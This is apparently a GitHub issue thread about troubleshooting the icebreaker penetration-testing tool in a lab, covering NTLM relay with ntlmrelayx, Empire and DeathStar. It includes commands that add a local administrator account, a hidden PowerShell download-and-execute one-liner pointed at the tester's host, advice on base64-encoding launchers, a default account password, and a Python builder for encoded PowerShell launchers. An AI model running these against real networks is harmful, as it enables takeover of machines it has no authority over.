login after successful attack #4
Can you send me the ntlmrelayx.py output both before and after icebreaker said it added the new user? |
ntlmrelayx.py.log |
This is very odd. It looks like it should've successfully completed. Have you logged into the machine at .1 and confirmed icebreaker is not a user with |
I can login and see a local user "icebreaker" but I can't remotely execute
code as him via smb, he has no admin permissions, no rdp etc.
On 06.03.2018 at 18:53, "Dan McInerney" <notifications@github.com> wrote:
… This is very odd. It looks like it should've successfully completed. Have
you logged into the machine at .1 and confirmed icebreaker is not a user
with net user? I can't find anything in the code that might be the cause
here.
|
Ah, interesting. OK so ntlmrelayx runs a command like this: net user icebreaker /add; net localgroup administrators /add icebreaker; <mimikatz/empire launcher code>. So my question is, did the script parse any mimikatz output or did you get an empire launcher if you ran it with --auto? Because I'm thinking the user that we hijacked the SMB connection from may not have had permissions to add a user to local admin (not sure how this would happen), or maybe the local administrators group was renamed? Or possibly an antivirus prevented the addition of the user to the local admins. Last possibility I can think of that might be the most likely is there's a GPO policy in place that overwrites the Administrators group to whatever is specified in the GPO. |
AV is deactivated for this first test. --auto just gives me an error: submodule "empire" isn't setup correctly: Traceback (most recent call last): So DeathStar can't connect to it. |
You must've cloned icebreaker in the short period of time yesterday that I
was messing with Empire versions as that error you got was the same error I
was getting off the Empire dev branch. It should be working now. But the
fact you didn't see any mimikatz output points towards something happening
mid-command execution. One thing to try is to copy the base64 value out of
the ntlmrelayx command, then run it on the machine locally using:
powershell -nop -exec bypass -enc <base64 from end of ntlmrelayx command>.
I suggest doing this without the --auto flag so you get just the mimikatz
payload. This should give us the benefit of error messages if it fails
which will help a lot in figuring this out.
…On Wed, Mar 7, 2018 at 3:44 AM, theoneandonly-vector < ***@***.***> wrote:
AV is deactivated for this first test.
I don't see any mimikatz output.
--auto just gives me an error.. submodule "empire" isn't setup correctly:
Traceback (most recent call last):
File "empire", line 1360, in
main = empire.MainMenu(args=args)
File "/opt/icebreaker/submodules/Empire/lib/common/empire.py", line 84,
in __init__
(self.isroot, self.installPath, self.ipWhiteList, self.ipBlackList,
self.obfuscate, self.obfuscateCommand) = helpers.get_config('rootuser,
install_path,ip_whitelist,ip_blacklist,obfuscate,obfuscate_command')
File "/opt/icebreaker/submodules/Empire/lib/common/helpers.py", line 554,
in get_config
cur.execute("ALTER TABLE config ADD COLUMN %s BLOB" % (field))
sqlite3.OperationalError: no such table: config
So DeathStar can't connect to it.
|
new error occurred after re-installing:
[*] Attack 4: NTLM relay with Responder and ntlmrelayx
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
Command has been completed, press ENTER to exit the terminal. |
and what does this mean exactly?: |
could you tell me how I can get a powershell empire session through custom command execution? and web-delivery also won't work: |
rpc_s_access_denied is an ntlmrelayx error but nothing to worry about; cmd
exec will occur without it.
when you're doing the single command you're using double quotes twice. The
command prompt is interpreting that as " powershell.exe -nop -w hidden -c "
being one string, then " IEX ((new-object net.webclient).downloadstring('
http://10.20.23.188:80/')) " as a second string. You'll need to escape the
right quotes with \". I'll look into the right way to do it as soon as I
can probably in the next couple weeks, just a lil busy at the moment.
…On Fri, Mar 9, 2018 at 8:24 AM, theoneandonly-vector < ***@***.***> wrote:
could you tell me, how I can get a powershell empire session throgh custom
command execution?
as the powershell-oneliner it can generate has some problems:
[*] Executed specified command on host: 10.20.23.1
[-] 'ascii' codec can't encode character u'\ufffd' in position 309:
ordinal not in range(128)
and web-delivery also won't work:
./icebreaker.py -l /home/admin/Desktop/targets.txt -s dns -c
"powershell.exe -nop -w hidden -c "IEX ((new-object
net.webclient).downloadstring('http://10.20.23.188:80/'))""
bash: syntax error near unexpected token `('
|
I misspoke earlier. The rpc_s_access_denied error occurs when you are relaying a user with non-admin rights on the target machine. Command exec will not occur in this situation. The error I was thinking of, which I keep seeing and which doesn't affect command execution, is "SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access flags are incompatible.)"

The error you're getting where it says connection refused could be a handful of things. I think the most likely is that the adapter it's using (enp0s3) is not the correct one. You'll want to use your main internet connection adapter. You can see a list of your adapters with

As for your error trying to get an empire shell with -c, I didn't have any trouble in my tests just now. The \ufffd unicode character is the replacement character for when unicode doesn't have a code for the character. This shouldn't occur in the Empire powershell launcher commands as they're base64 encoded, which only uses characters that unicode can interpret. Are you pasting the Empire powershell launcher into a different program, then copying it out of that program? It seems like an artifact from another program, or you're copying too many characters when you copy the Empire launcher out of the terminal.

Last, your best bet for getting metasploit's web delivery to work is to base64 encode it first using https://raikia.com/tool-powershell-encoder/. So take

The reason you're having trouble with the MSF webshell delivery is because you have to account for the fact that any command you want to run using icebreaker is going through 3 different interpreters: first bash because we run it in a terminal, then python interprets it, then the windows shell interprets it. Each of these has different special characters. You can mostly ignore the python interpreter because it's going to take the whole command as a string, but bash and windows are gonna mess with it.
Best to avoid special chars like (, ), !, ~, etc entirely by base64 encoding the command. |
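As an added example (not icebreaker's, ntlmrelayx's or Empire's own code), the following Python does the two things the thread keeps coming back to: it builds a `-enc` payload the way `powershell -nop -exec bypass -enc <base64>` expects it (UTF-16LE text, then base64), so the command survives bash, Python and cmd.exe without any quote escaping, and it checks a command string for the non-ASCII characters behind the `'ascii' codec can't encode` error. The PowerShell script it encodes is constructed for this thread: it reports whether the `icebreaker` account exists, is enabled, and is a member of the local Administrators group, looking the group up by its well-known SID S-1-5-32-544 so a renamed Administrators group (one of the possibilities raised earlier) is still found. It assumes the Microsoft.PowerShell.LocalAccounts cmdlets (Windows 10 / Server 2016 and later) on the target; the user name and the launcher flags are taken from the thread, everything else is an assumption.

```python
"""Build a quoting-safe PowerShell -EncodedCommand launcher.

Added example, not icebreaker's or ntlmrelayx's code. The embedded
PowerShell script is constructed for this thread and assumes the
Microsoft.PowerShell.LocalAccounts cmdlets exist on the target.
"""
import base64
import re

# Constructed check: account present? enabled? in the local Administrators
# group? The group is resolved by its well-known SID (S-1-5-32-544) rather
# than by the name "Administrators", so a renamed group is still found.
CHECK_SCRIPT = r"""
$u = Get-LocalUser -Name 'icebreaker' -ErrorAction SilentlyContinue
if (-not $u) { 'user icebreaker: MISSING'; exit 1 }
'user icebreaker: present, enabled=' + $u.Enabled
$grp = Get-LocalGroup -SID 'S-1-5-32-544'
$member = Get-LocalGroupMember -SID 'S-1-5-32-544' | Where-Object { $_.SID -eq $u.SID }
'group ' + $grp.Name + ': member=' + [bool]$member
"""

# Launcher flags as used in the thread; the script itself is the variable part.
LAUNCHER_PREFIX = "powershell.exe -nop -w hidden -exec bypass -enc "


def encode_command(script: str) -> str:
    """powershell.exe -EncodedCommand expects base64 over UTF-16LE text,
    not over UTF-8; encoding UTF-8 yields garbage on the target."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command; useful for reading what a captured
    ntlmrelayx/Empire launcher actually runs."""
    return base64.b64decode(blob).decode("utf-16-le")


_B64 = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def is_shell_safe(command: str) -> bool:
    """True if the string contains only base64 characters, none of which
    bash, cmd.exe or Python treat as special (no quotes, parens, !, ~, $)."""
    return bool(_B64.fullmatch(command))


def non_ascii_chars(text: str) -> list:
    """Characters that would trigger the thread's
    "'ascii' codec can't encode character" error before the command is sent."""
    return [c for c in text if ord(c) > 127]


def build_launcher(script: str) -> str:
    """Full one-liner to hand to icebreaker's -c or run locally on the target."""
    return LAUNCHER_PREFIX + encode_command(script)


if __name__ == "__main__":
    launcher = build_launcher(CHECK_SCRIPT)
    blob = launcher[len(LAUNCHER_PREFIX):]
    assert is_shell_safe(blob) and not non_ascii_chars(launcher)
    print(launcher)
```

Paste the printed line into a cmd prompt on the target (the test Dan suggests above), or pass it as the -c argument; because the blob is pure base64, the shell quoting problem in the web-delivery one-liner does not arise. To inspect a launcher you captured from ntlmrelayx, feed the base64 tail to `decode_command`.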
I finally got your errors about the connection while testing. It happens when Empire is not done booting up the REST API and we try to call DeathStar. I will fix this today to give it better error handling. |
So there doesn't seem to be an easy way of gracefully handling the connection errors DeathStar sends out if it tries to connect to Empire before the REST API is good to go. So I just increased the timeout between Empire starting up and DeathStar starting up which should fix it on everything but the absolute slowest of computers. |
it somehow crashes directly when the attack starts (no timeout):
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
|
Hmm yeah you're right. I'm not sure about this one. My main suspicion is that enp0s3 is the wrong interface. My VM will only bring up eth0 and lo interfaces and Responder works with lo so I'm not sure how to test with an incorrect interface. I tried running icebreaker with multiple responder programs running, but that didn't cause that error either. At this point I'd say try a different interface and let me know how that goes. |
I have only these: lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 |
Dang so that's not it. I'm a bit at a loss.
…On Mar 15, 2018 12:23 PM, "theoneandonly-vector" ***@***.***> wrote:
I have only these:
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.20.23.188 netmask 255.255.255.0 broadcast 10.20.23.255
inet6 fe80::8c80:2bed:1dc5:8582 prefixlen 64 scopeid 0x20
ether 08:00:27:75:c8:a5 txqueuelen 1000 (Ethernet)
RX packets 6499 bytes 9136163 (8.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2522 bytes 173337 (169.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 17 bytes 1497 (1.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17 bytes 1497 (1.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
|
hey there
It tells me it automatically created an account "icebreaker:P@ssword123456"
but I somehow can't login via psexec:
[*] 10.20.23.1:445 - Authenticating to 10.20.23.1:445 as user 'icebreaker'...
[*] 10.20.23.1:445 - Uploading payload...
[-] 10.20.23.1:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
it's the AD in my test environment.